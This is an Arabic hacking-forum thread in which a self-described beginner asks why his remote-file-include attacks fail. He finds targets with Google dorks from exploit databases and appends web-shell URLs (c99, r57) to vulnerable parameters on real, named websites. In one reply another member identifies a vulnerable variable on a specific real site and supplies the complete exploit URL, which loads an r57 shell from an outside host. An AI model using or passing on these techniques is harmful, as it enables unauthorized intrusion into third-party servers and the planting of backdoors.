![]() | رقم المشاركة : 1 (permalink) |
![]() السلام عليكم يا عناكب اليوم عندي سؤال حول رفع الشيل أنا في دائم الأحيان ما أذهب إلى موقع www.milw0rm.com أو www.exploit-db.com و أستخرج بعض الثغرات أقوم بعمل نسخ و لصق للدورك في google تخرج لي العديد من المواقع ( أحاول توضيح إستفساري بطريقة واضحة جدا جدا جدا ) أقوم بفتحها كلها بمعنى الكلمة من الصفحة 1 إلى 50 ( كل المواقع ) أقوم بعمل الإستثمار و وضع الرابط الشيل المباشر مع علامة ? يعني حتى الآن تمام كل شيء إذن المشكلة أنه، تقريبا و في جميع المواقع يظهر التالي : ![]() و هذا طبعا بعد وضع الإستثمار و بعد وضع الشيل و العلامة و أحيانا أخرى تبقى الصفحة بيضاء إذن سؤالي هو : هل هذا يعني أنه تم ترقيغ الثغرة، أم هناك مشكلة في عملي مع العلم أنني جربت كل المواقع و جربت عدة ثغرات لم يصلح معي أي منها تحياتي Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC fow,w vtu hgadg :!! | |
| ![]() |
![]() | رقم المشاركة : 4 (permalink) |
![]() يزيد العتيبي | |
| ![]() |
![]() | رقم المشاركة : 5 (permalink) | |||||||||||||||||||||
![]() يزيد العتيبي الي قاله تمام
المتغير المصاب ما بيطلع بالخطا ما اعرف يلا ان شاء الله خير (مدري عملتوها هوشه ههههه ) حصل خير ان شاء الله
| ||||||||||||||||||||||
| ![]() |
![]() | رقم المشاركة : 6 (permalink) |
![]() [align=center]VoLc4n0 | |
| ![]() |
![]() | رقم المشاركة : 7 (permalink) | |||||||||||||||||||||||||
![]()
حبيبي شوف D:\Websites\LOGICmerce\www\poll\admin\common.inc.p hp on line 45 PHP Warning: main(/lang/english.php): failed to open stream: No such file or directory in يعني فشل في قرائة ملف english.php في المسار lang خطا عادي من داخل السيرفر ما عنده علاقة يثغرات الانكلود
| ||||||||||||||||||||||||||
| ![]() |
![]() | رقم المشاركة : 8 (permalink) |
![]() d4rK-h4ck3r | |
| ![]() |
![]() | رقم المشاركة : 9 (permalink) | ||
![]()
| |||
| ![]() |
![]() | رقم المشاركة : 10 (permalink) |
![]() بارك الله فيكم إخواني على المرور أخي يزيد تشكر، لكن يعني ما زلت مبتدئ، و لا زال علي إستغلال هذه الثغرة و ذلك أولا للتطبيق مع الدروس، بعدها ممكن أنتقل إلى sql و باقي الثغرات أخي دارك بارك الله فيك على رأيك، و أنا قلت، لما أكمل مشواري في التعلم راح أنتقل إلى مستوى آخر أخي الكريم فولكانو مشكور على المرور و على المتابعة الدائمة منك صراحة مدير مثلك ولا خلي ![]() -------------------------------------------------- الآن أخي الكريم الهيكل الأزرق، آسف على التأخير، و ذلك أنني حاولت إستثمار الثغرة، و لكن بدون جدوى يعني أنا لست فاهم جيدا الأمر، هذا الموقع الذي أعطيتني له، لم تعطني الثغرة معه و أنا لست عارف الملف المصاب هنا ( لا زلت مبتدئ ) أنا بصراحة لا زلت في الإختراق العشوائي المهم راح أجيبك أنا رحت بحثت في موقع www.exploit-db.com عن ثغرات remote file include أعطاني عدة ثغرات، قمت بإختيار التي تحتوي على الدورك مثلا لنفترض أنني إخترت الثغرة التي تحمل الدورك inurl:"com_mojo" ( نسيت إسم الثغرة ) و إستغلالها هو : http://www.site.com/components/com_m...ute_path=shell قمت بإدخال الدورك في google، ظهرت العديد من المواقع نفترض أننا إخترنا هذا الموقع : http://www.shineonbrightly.com/compo...temid,44/p,92/ فلنقم الآن بعمل الإستثمار : http://www.shineonbrightly.com/compo...y.com/c99.txt? الآن كل شيء تمام، أليس هذا صحيحا ؟ لنقم بإلصاق الإستغلال في المتصفح هنا يأتي سؤال، لاحظ حبيبي ماذا ينتج : ![]() و هكذا مع باقي المواقع ( نصف هكذا و نصف صفحة بيضاء ) هل عملي صحيح ؟ هل أنا مخطئ في شيء ؟ ( لا أظن ) قمت بإختيار ثغرة أخر من نوع remote file include يبقى نفس الشيء ------------------------------------------------------- بالنسبة للموقع الذي أنت وضعته بصراحة لم أفهم شيء، لأني بدون وضع الإستغلال لا أستطيع عمل شيء، و ذلك أنني مبتدئ في هذا المجال يا ريت يا غالي تشرح لنا طريقة و الله بارك الله فيك يا ولد بلادي صراحة أول مرة أرى شخص يريد يتابع إستفسار شخص ما بهذه الطريقة فبارك الله فيك و جعلها اللهم في ميزان حسناتك تحياتي لك و لباقي الإخوة | |
| ![]() |
![]() | رقم المشاركة : 11 (permalink) |
![]() akram05batna كود PHP: لاحظ النص : base_path in D:\Websites\LOGICmerce\www\poll\admin\common.inc.p hp شوف المتغير < base_path > اذن الاستغلال بيكون كذا :: http://www.logicmerce.com/poll/admin...php?base_path= الان كل شي تمام اخير نضع رابط الشل تفضـل ... ! http://www.idasy.com/r57.txt? الاستغلال كامل هو http://www.logicmerce.com/poll/admin...y.com/r57.txt? ومبروك عليك وان شاء الله تكون فهمت طبعا اخي المهم ابيك تعرف كيف تحصل على المتغير بعد دخولك للشل اقرأ الملف هذا : common.inc.php ابحث عن /admin/ بتلاحظ بوجود الممتغير الصحيح له والان اتمنى تكون فهمت اخي الغالي اكرم بالتوفيق لك وللجميــع | |
| ![]() |
![]() | رقم المشاركة : 12 (permalink) | |||||||||||||||||||||||||
![]()
بكل صراحه انت مبدع فاجئتني بحركتك :18: تحياتي يا بطل
| ||||||||||||||||||||||||||
| ![]() |
![]() | رقم المشاركة : 13 (permalink) |
![]() بصراحة أخي الهيكل الأزرق بارك الله فيك و ما شاء الله عليك لو أقول لك شيء هل تصدقني ؟ أقسم لك بالله منذ تعلمي 2 أشهر الآن فمهت منك جزء من ثغرة Remote File Include يعني يا غالي قصدك أنه لما ينتج خطأ مثل هذا، نقوم بإضافة المتغير مع إضافة الشيل ما شاء الله و الله فمهت، لكن فقط لو تكرمت سؤال أخير ليتضح لي كل شيء بإذن الله كيف لي أن أكشف الخطأ في الموقع، مثلا هذا الموقع كيف إكتشفت تلك الصفحة أنت كذلك هل أنا في عملي كما ذكرت لك في الرد رقم 10، هل عملي صحيح، و هل هكذا مع كل و باقي الثغرات ؟ و بارك الله فيك و مشكور مرة ثانية، و صراحة تستاهل كل خير، و أنت شرف لهذا المنتدى يا غالي التعديل الأخير تم بواسطة TIKTAKram ; 04-11-2010 الساعة 04:03 PM. | |
| ![]() |
![]() | رقم المشاركة : 14 (permalink) | |||||||||||||||||||||
![]()
صحيح 100% لكن الثغره تكون مرقعه لكتشاف مثل هذه الثغرات يفضل تحميل السكربتات على جهازك وفحصها بنفسك
| ||||||||||||||||||||||
| ![]() |
![]() | رقم المشاركة : 15 (permalink) | ||
![]() شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
| |||
| ![]() |
![]() |
مواقع النشر (المفضلة) |
|
|
![]() | ||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
حصـريا : تخطى السيف مود و العب بالدوال و تخطى تعطيل السيم لينك مـن الشيل | Dr.Alaa | قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات | 13 | 11-07-2013 04:10 AM |
ممكن شرح حول الشيل | .~Amer.?AlnJ0M~.! | جـــ'ابات العناكــ'ب | 3 | 09-02-2009 10:07 PM |
مساعدة فى الشيل | THE WARRIOR | جـــ'ابات العناكــ'ب | 2 | 06-26-2009 08:29 PM |